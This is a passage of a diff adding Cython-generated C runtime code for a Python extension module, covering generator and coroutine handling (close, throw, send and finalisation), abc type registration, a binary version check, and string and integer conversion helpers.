__Pyx_AsyncGen_USED + if (__pyx_PyAsyncGenASend_CheckExact(yf)) { + retval = __Pyx_async_gen_asend_close(yf, NULL); + } else + if (__pyx_PyAsyncGenAThrow_CheckExact(yf)) { + retval = __Pyx_async_gen_athrow_close(yf, NULL); + } else + #endif + { + PyObject *meth; + gen->is_running = 1; + meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_close); + if (unlikely(!meth)) { + if (unlikely(PyErr_Occurred())) { + PyErr_WriteUnraisable(yf); + } + } else { + retval = __Pyx_PyObject_CallNoArg(meth); + Py_DECREF(meth); + if (unlikely(!retval)) + err = -1; + } + gen->is_running = 0; + } + Py_XDECREF(retval); + return err; +} +static PyObject *__Pyx_Generator_Next(PyObject *self) { + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; + PyObject *yf = gen->yieldfrom; + if (unlikely(gen->is_running)) + return __Pyx_Coroutine_AlreadyRunningError(gen); + if (yf) { + PyObject *ret; + gen->is_running = 1; + #ifdef __Pyx_Generator_USED + if (__Pyx_Generator_CheckExact(yf)) { + ret = __Pyx_Generator_Next(yf); + } else + #endif + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) + if (PyGen_CheckExact(yf)) { + ret = __Pyx_PyGen_Send((PyGenObject*)yf, NULL); + } else + #endif + #ifdef __Pyx_Coroutine_USED + if (__Pyx_Coroutine_Check(yf)) { + ret = __Pyx_Coroutine_Send(yf, Py_None); + } else + #endif + ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); + gen->is_running = 0; + if (likely(ret)) { + return ret; + } + return __Pyx_Coroutine_FinishDelegation(gen); + } + return __Pyx_Coroutine_SendEx(gen, Py_None, 0); +} +static PyObject *__Pyx_Coroutine_Close_Method(PyObject *self, PyObject *arg) { + CYTHON_UNUSED_VAR(arg); + return __Pyx_Coroutine_Close(self); +} +static PyObject *__Pyx_Coroutine_Close(PyObject *self) { + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; + PyObject *retval, *raised_exception; + PyObject *yf = gen->yieldfrom; + int err = 0; + if (unlikely(gen->is_running)) + return __Pyx_Coroutine_AlreadyRunningError(gen); + if (yf) { + Py_INCREF(yf); + err = __Pyx_Coroutine_CloseIter(gen, yf); + __Pyx_Coroutine_Undelegate(gen); + Py_DECREF(yf); + } + if (err == 0) + PyErr_SetNone(PyExc_GeneratorExit); + retval = __Pyx_Coroutine_SendEx(gen, NULL, 1); + if (unlikely(retval)) { + const char *msg; + Py_DECREF(retval); + if ((0)) { + #ifdef __Pyx_Coroutine_USED + } else if (__Pyx_Coroutine_Check(self)) { + msg = "coroutine ignored GeneratorExit"; + #endif + #ifdef __Pyx_AsyncGen_USED + } else if (__Pyx_AsyncGen_CheckExact(self)) { +#if PY_VERSION_HEX < 0x03060000 + msg = "async generator ignored GeneratorExit - might require Python 3.6+ finalisation (PEP 525)"; +#else + msg = "async generator ignored GeneratorExit"; +#endif + #endif + } else { + msg = "generator ignored GeneratorExit"; + } + PyErr_SetString(PyExc_RuntimeError, msg); + return NULL; + } + raised_exception = PyErr_Occurred(); + if (likely(!raised_exception || __Pyx_PyErr_GivenExceptionMatches2(raised_exception, PyExc_GeneratorExit, PyExc_StopIteration))) { + if (raised_exception) PyErr_Clear(); + Py_INCREF(Py_None); + return Py_None; + } + return NULL; +} +static PyObject *__Pyx__Coroutine_Throw(PyObject *self, PyObject *typ, PyObject *val, PyObject *tb, + PyObject *args, int close_on_genexit) { + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; + PyObject *yf = gen->yieldfrom; + if (unlikely(gen->is_running)) + return __Pyx_Coroutine_AlreadyRunningError(gen); + if (yf) { + PyObject *ret; + Py_INCREF(yf); + if (__Pyx_PyErr_GivenExceptionMatches(typ, PyExc_GeneratorExit) && close_on_genexit) { + int err = __Pyx_Coroutine_CloseIter(gen, yf); + Py_DECREF(yf); + __Pyx_Coroutine_Undelegate(gen); + if (err < 0) + return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); + goto throw_here; + } + gen->is_running = 1; + if (0 + #ifdef __Pyx_Generator_USED + || __Pyx_Generator_CheckExact(yf) + #endif + #ifdef __Pyx_Coroutine_USED + || __Pyx_Coroutine_Check(yf) + #endif + ) { + ret = __Pyx__Coroutine_Throw(yf, typ, val, tb, args, close_on_genexit); + #ifdef __Pyx_Coroutine_USED + } else if (__Pyx_CoroutineAwait_CheckExact(yf)) { + ret = __Pyx__Coroutine_Throw(((__pyx_CoroutineAwaitObject*)yf)->coroutine, typ, val, tb, args, close_on_genexit); + #endif + } else { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_throw); + if (unlikely(!meth)) { + Py_DECREF(yf); + if (unlikely(PyErr_Occurred())) { + gen->is_running = 0; + return NULL; + } + __Pyx_Coroutine_Undelegate(gen); + gen->is_running = 0; + goto throw_here; + } + if (likely(args)) { + ret = __Pyx_PyObject_Call(meth, args, NULL); + } else { + PyObject *cargs[4] = {NULL, typ, val, tb}; + ret = __Pyx_PyObject_FastCall(meth, cargs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); + } + Py_DECREF(meth); + } + gen->is_running = 0; + Py_DECREF(yf); + if (!ret) { + ret = __Pyx_Coroutine_FinishDelegation(gen); + } + return __Pyx_Coroutine_MethodReturn(self, ret); + } +throw_here: + __Pyx_Raise(typ, val, tb, NULL); + return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); +} +static PyObject *__Pyx_Coroutine_Throw(PyObject *self, PyObject *args) { + PyObject *typ; + PyObject *val = NULL; + PyObject *tb = NULL; + if (unlikely(!PyArg_UnpackTuple(args, (char *)"throw", 1, 3, &typ, &val, &tb))) + return NULL; + return __Pyx__Coroutine_Throw(self, typ, val, tb, args, 1); +} +static CYTHON_INLINE int __Pyx_Coroutine_traverse_excstate(__Pyx_ExcInfoStruct *exc_state, visitproc visit, void *arg) { +#if PY_VERSION_HEX >= 0x030B00a4 + Py_VISIT(exc_state->exc_value); +#else + Py_VISIT(exc_state->exc_type); + Py_VISIT(exc_state->exc_value); + Py_VISIT(exc_state->exc_traceback); +#endif + return 0; +} +static int __Pyx_Coroutine_traverse(__pyx_CoroutineObject *gen, visitproc visit, void *arg) { + Py_VISIT(gen->closure); + Py_VISIT(gen->classobj); + Py_VISIT(gen->yieldfrom); + return __Pyx_Coroutine_traverse_excstate(&gen->gi_exc_state, visit, arg); +} +static int __Pyx_Coroutine_clear(PyObject *self) { + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; + Py_CLEAR(gen->closure); + Py_CLEAR(gen->classobj); + Py_CLEAR(gen->yieldfrom); + __Pyx_Coroutine_ExceptionClear(&gen->gi_exc_state); +#ifdef __Pyx_AsyncGen_USED + if (__Pyx_AsyncGen_CheckExact(self)) { + Py_CLEAR(((__pyx_PyAsyncGenObject*)gen)->ag_finalizer); + } +#endif + Py_CLEAR(gen->gi_code); + Py_CLEAR(gen->gi_frame); + Py_CLEAR(gen->gi_name); + Py_CLEAR(gen->gi_qualname); + Py_CLEAR(gen->gi_modulename); + return 0; +} +static void __Pyx_Coroutine_dealloc(PyObject *self) { + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; + PyObject_GC_UnTrack(gen); + if (gen->gi_weakreflist != NULL) + PyObject_ClearWeakRefs(self); + if (gen->resume_label >= 0) { + PyObject_GC_Track(self); +#if PY_VERSION_HEX >= 0x030400a1 && CYTHON_USE_TP_FINALIZE + if (unlikely(PyObject_CallFinalizerFromDealloc(self))) +#else + Py_TYPE(gen)->tp_del(self); + if (unlikely(Py_REFCNT(self) > 0)) +#endif + { + return; + } + PyObject_GC_UnTrack(self); + } +#ifdef __Pyx_AsyncGen_USED + if (__Pyx_AsyncGen_CheckExact(self)) { + /* We have to handle this case for asynchronous generators + right here, because this code has to be between UNTRACK + and GC_Del. */ + Py_CLEAR(((__pyx_PyAsyncGenObject*)self)->ag_finalizer); + } +#endif + __Pyx_Coroutine_clear(self); + __Pyx_PyHeapTypeObject_GC_Del(gen); +} +static void __Pyx_Coroutine_del(PyObject *self) { + PyObject *error_type, *error_value, *error_traceback; + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; + __Pyx_PyThreadState_declare + if (gen->resume_label < 0) { + return; + } +#if !CYTHON_USE_TP_FINALIZE + assert(self->ob_refcnt == 0); + __Pyx_SET_REFCNT(self, 1); +#endif + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&error_type, &error_value, &error_traceback); +#ifdef __Pyx_AsyncGen_USED + if (__Pyx_AsyncGen_CheckExact(self)) { + __pyx_PyAsyncGenObject *agen = (__pyx_PyAsyncGenObject*)self; + PyObject *finalizer = agen->ag_finalizer; + if (finalizer && !agen->ag_closed) { + PyObject *res = __Pyx_PyObject_CallOneArg(finalizer, self); + if (unlikely(!res)) { + PyErr_WriteUnraisable(self); + } else { + Py_DECREF(res); + } + __Pyx_ErrRestore(error_type, error_value, error_traceback); + return; + } + } +#endif + if (unlikely(gen->resume_label == 0 && !error_value)) { +#ifdef __Pyx_Coroutine_USED +#ifdef __Pyx_Generator_USED + if (!__Pyx_Generator_CheckExact(self)) +#endif + { + PyObject_GC_UnTrack(self); +#if PY_MAJOR_VERSION >= 3 || defined(PyErr_WarnFormat) + if (unlikely(PyErr_WarnFormat(PyExc_RuntimeWarning, 1, "coroutine '%.50S' was never awaited", gen->gi_qualname) < 0)) + PyErr_WriteUnraisable(self); +#else + {PyObject *msg; + char *cmsg; + #if CYTHON_COMPILING_IN_PYPY + msg = NULL; + cmsg = (char*) "coroutine was never awaited"; + #else + char *cname; + PyObject *qualname; + qualname = gen->gi_qualname; + cname = PyString_AS_STRING(qualname); + msg = PyString_FromFormat("coroutine '%.50s' was never awaited", cname); + if (unlikely(!msg)) { + PyErr_Clear(); + cmsg = (char*) "coroutine was never awaited"; + } else { + cmsg = PyString_AS_STRING(msg); + } + #endif + if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, cmsg, 1) < 0)) + PyErr_WriteUnraisable(self); + Py_XDECREF(msg);} +#endif + PyObject_GC_Track(self); + } +#endif + } else { + PyObject *res = __Pyx_Coroutine_Close(self); + if (unlikely(!res)) { + if (PyErr_Occurred()) + PyErr_WriteUnraisable(self); + } else { + Py_DECREF(res); + } + } + __Pyx_ErrRestore(error_type, error_value, error_traceback); +#if !CYTHON_USE_TP_FINALIZE + assert(Py_REFCNT(self) > 0); + if (likely(--self->ob_refcnt == 0)) { + return; + } + { + Py_ssize_t refcnt = Py_REFCNT(self); + _Py_NewReference(self); + __Pyx_SET_REFCNT(self, refcnt); + } +#if CYTHON_COMPILING_IN_CPYTHON + assert(PyType_IS_GC(Py_TYPE(self)) && + _Py_AS_GC(self)->gc.gc_refs != _PyGC_REFS_UNTRACKED); + _Py_DEC_REFTOTAL; +#endif +#ifdef COUNT_ALLOCS + --Py_TYPE(self)->tp_frees; + --Py_TYPE(self)->tp_allocs; +#endif +#endif +} +static PyObject * +__Pyx_Coroutine_get_name(__pyx_CoroutineObject *self, void *context) +{ + PyObject *name = self->gi_name; + CYTHON_UNUSED_VAR(context); + if (unlikely(!name)) name = Py_None; + Py_INCREF(name); + return name; +} +static int +__Pyx_Coroutine_set_name(__pyx_CoroutineObject *self, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(self->gi_name, value); + return 0; +} +static PyObject * +__Pyx_Coroutine_get_qualname(__pyx_CoroutineObject *self, void *context) +{ + PyObject *name = self->gi_qualname; + CYTHON_UNUSED_VAR(context); + if (unlikely(!name)) name = Py_None; + Py_INCREF(name); + return name; +} +static int +__Pyx_Coroutine_set_qualname(__pyx_CoroutineObject *self, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(self->gi_qualname, value); + return 0; +} +static PyObject * +__Pyx_Coroutine_get_frame(__pyx_CoroutineObject *self, void *context) +{ + PyObject *frame = self->gi_frame; + CYTHON_UNUSED_VAR(context); + if (!frame) { + if (unlikely(!self->gi_code)) { + Py_RETURN_NONE; + } + frame = (PyObject *) PyFrame_New( + PyThreadState_Get(), /*PyThreadState *tstate,*/ + (PyCodeObject*) self->gi_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (unlikely(!frame)) + return NULL; + self->gi_frame = frame; + } + Py_INCREF(frame); + return frame; +} +static __pyx_CoroutineObject *__Pyx__Coroutine_New( + PyTypeObject* type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, + PyObject *name, PyObject *qualname, PyObject *module_name) { + __pyx_CoroutineObject *gen = PyObject_GC_New(__pyx_CoroutineObject, type); + if (unlikely(!gen)) + return NULL; + return __Pyx__Coroutine_NewInit(gen, body, code, closure, name, qualname, module_name); +} +static __pyx_CoroutineObject *__Pyx__Coroutine_NewInit( + __pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, + PyObject *name, PyObject *qualname, PyObject *module_name) { + gen->body = body; + gen->closure = closure; + Py_XINCREF(closure); + gen->is_running = 0; + gen->resume_label = 0; + gen->classobj = NULL; + gen->yieldfrom = NULL; + #if PY_VERSION_HEX >= 0x030B00a4 + gen->gi_exc_state.exc_value = NULL; + #else + gen->gi_exc_state.exc_type = NULL; + gen->gi_exc_state.exc_value = NULL; + gen->gi_exc_state.exc_traceback = NULL; + #endif +#if CYTHON_USE_EXC_INFO_STACK + gen->gi_exc_state.previous_item = NULL; +#endif + gen->gi_weakreflist = NULL; + Py_XINCREF(qualname); + gen->gi_qualname = qualname; + Py_XINCREF(name); + gen->gi_name = name; + Py_XINCREF(module_name); + gen->gi_modulename = module_name; + Py_XINCREF(code); + gen->gi_code = code; + gen->gi_frame = NULL; + PyObject_GC_Track(gen); + return gen; +} + +/* PatchModuleWithCoroutine */ +static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code) { +#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + int result; + PyObject *globals, *result_obj; + globals = PyDict_New(); if (unlikely(!globals)) goto ignore; + result = PyDict_SetItemString(globals, "_cython_coroutine_type", + #ifdef __Pyx_Coroutine_USED + (PyObject*)__pyx_CoroutineType); + #else + Py_None); + #endif + if (unlikely(result < 0)) goto ignore; + result = PyDict_SetItemString(globals, "_cython_generator_type", + #ifdef __Pyx_Generator_USED + (PyObject*)__pyx_GeneratorType); + #else + Py_None); + #endif + if (unlikely(result < 0)) goto ignore; + if (unlikely(PyDict_SetItemString(globals, "_module", module) < 0)) goto ignore; + if (unlikely(PyDict_SetItemString(globals, "__builtins__", __pyx_b) < 0)) goto ignore; + result_obj = PyRun_String(py_code, Py_file_input, globals, globals); + if (unlikely(!result_obj)) goto ignore; + Py_DECREF(result_obj); + Py_DECREF(globals); + return module; +ignore: + Py_XDECREF(globals); + PyErr_WriteUnraisable(module); + if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, "Cython module failed to patch module with custom type", 1) < 0)) { + Py_DECREF(module); + module = NULL; + } +#else + py_code++; +#endif + return module; +} + +/* PatchGeneratorABC */ +#ifndef CYTHON_REGISTER_ABCS +#define CYTHON_REGISTER_ABCS 1 +#endif +#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) +static PyObject* __Pyx_patch_abc_module(PyObject *module); +static PyObject* __Pyx_patch_abc_module(PyObject *module) { + module = __Pyx_Coroutine_patch_module( + module, "" +"if _cython_generator_type is not None:\n" +" try: Generator = _module.Generator\n" +" except AttributeError: pass\n" +" else: Generator.register(_cython_generator_type)\n" +"if _cython_coroutine_type is not None:\n" +" try: Coroutine = _module.Coroutine\n" +" except AttributeError: pass\n" +" else: Coroutine.register(_cython_coroutine_type)\n" + ); + return module; +} +#endif +static int __Pyx_patch_abc(void) { +#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + static int abc_patched = 0; + if (CYTHON_REGISTER_ABCS && !abc_patched) { + PyObject *module; + module = PyImport_ImportModule((PY_MAJOR_VERSION >= 3) ? "collections.abc" : "collections"); + if (unlikely(!module)) { + PyErr_WriteUnraisable(NULL); + if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, + ((PY_MAJOR_VERSION >= 3) ? + "Cython module failed to register with collections.abc module" : + "Cython module failed to register with collections module"), 1) < 0)) { + return -1; + } + } else { + module = __Pyx_patch_abc_module(module); + abc_patched = 1; + if (unlikely(!module)) + return -1; + Py_DECREF(module); + } + module = PyImport_ImportModule("backports_abc"); + if (module) { + module = __Pyx_patch_abc_module(module); + Py_XDECREF(module); + } + if (!module) { + PyErr_Clear(); + } + } +#else + if ((0)) __Pyx_Coroutine_patch_module(NULL, NULL); +#endif + return 0; +} + +/* Generator */ +static PyMethodDef __pyx_Generator_methods[] = { + {"send", (PyCFunction) __Pyx_Coroutine_Send, METH_O, + (char*) PyDoc_STR("send(arg) -> send 'arg' into generator,\nreturn next yielded value or raise StopIteration.")}, + {"throw", (PyCFunction) __Pyx_Coroutine_Throw, METH_VARARGS, + (char*) PyDoc_STR("throw(typ[,val[,tb]]) -> raise exception in generator,\nreturn next yielded value or raise StopIteration.")}, + {"close", (PyCFunction) __Pyx_Coroutine_Close_Method, METH_NOARGS, + (char*) PyDoc_STR("close() -> raise GeneratorExit inside generator.")}, + {0, 0, 0, 0} +}; +static PyMemberDef __pyx_Generator_memberlist[] = { + {(char *) "gi_running", T_BOOL, offsetof(__pyx_CoroutineObject, is_running), READONLY, NULL}, + {(char*) "gi_yieldfrom", T_OBJECT, offsetof(__pyx_CoroutineObject, yieldfrom), READONLY, + (char*) PyDoc_STR("object being iterated by 'yield from', or None")}, + {(char*) "gi_code", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_code), READONLY, NULL}, + {(char *) "__module__", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_modulename), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CoroutineObject, gi_weakreflist), READONLY, 0}, +#endif + {0, 0, 0, 0, 0} +}; +static PyGetSetDef __pyx_Generator_getsets[] = { + {(char *) "__name__", (getter)__Pyx_Coroutine_get_name, (setter)__Pyx_Coroutine_set_name, + (char*) PyDoc_STR("name of the generator"), 0}, + {(char *) "__qualname__", (getter)__Pyx_Coroutine_get_qualname, (setter)__Pyx_Coroutine_set_qualname, + (char*) PyDoc_STR("qualified name of the generator"), 0}, + {(char *) "gi_frame", (getter)__Pyx_Coroutine_get_frame, NULL, + (char*) PyDoc_STR("Frame of the generator"), 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_GeneratorType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_Coroutine_dealloc}, + {Py_tp_traverse, (void *)__Pyx_Coroutine_traverse}, + {Py_tp_iter, (void *)PyObject_SelfIter}, + {Py_tp_iternext, (void *)__Pyx_Generator_Next}, + {Py_tp_methods, (void *)__pyx_Generator_methods}, + {Py_tp_members, (void *)__pyx_Generator_memberlist}, + {Py_tp_getset, (void *)__pyx_Generator_getsets}, + {Py_tp_getattro, (void *) __Pyx_PyObject_GenericGetAttrNoDict}, +#if CYTHON_USE_TP_FINALIZE + {Py_tp_finalize, (void *)__Pyx_Coroutine_del}, +#endif + {0, 0}, +}; +static PyType_Spec __pyx_GeneratorType_spec = { + __PYX_TYPE_MODULE_PREFIX "generator", + sizeof(__pyx_CoroutineObject), + 0, + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, + __pyx_GeneratorType_slots +}; +#else +static PyTypeObject __pyx_GeneratorType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "generator", + sizeof(__pyx_CoroutineObject), + 0, + (destructor) __Pyx_Coroutine_dealloc, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, + 0, + (traverseproc) __Pyx_Coroutine_traverse, + 0, + 0, + offsetof(__pyx_CoroutineObject, gi_weakreflist), + 0, + (iternextfunc) __Pyx_Generator_Next, + __pyx_Generator_methods, + __pyx_Generator_memberlist, + __pyx_Generator_getsets, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if CYTHON_USE_TP_FINALIZE + 0, +#else + __Pyx_Coroutine_del, +#endif + 0, +#if CYTHON_USE_TP_FINALIZE + __Pyx_Coroutine_del, +#elif PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_Generator_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_GeneratorType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_GeneratorType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_GeneratorType_type.tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; + __pyx_GeneratorType_type.tp_iter = PyObject_SelfIter; + __pyx_GeneratorType = __Pyx_FetchCommonType(&__pyx_GeneratorType_type); +#endif + if (unlikely(!__pyx_GeneratorType)) { + return -1; + } + return 0; +} + +/* CheckBinaryVersion */ +static int __Pyx_check_binary_version(void) { + char ctversion[5]; + int same=1, i, found_dot; + const char* rt_from_call = Py_GetVersion(); + PyOS_snprintf(ctversion, 5, "%d.%d", PY_MAJOR_VERSION, PY_MINOR_VERSION); + found_dot = 0; + for (i = 0; i < 4; i++) { + if (!ctversion[i]) { + same = (rt_from_call[i] < '0' || rt_from_call[i] > '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; 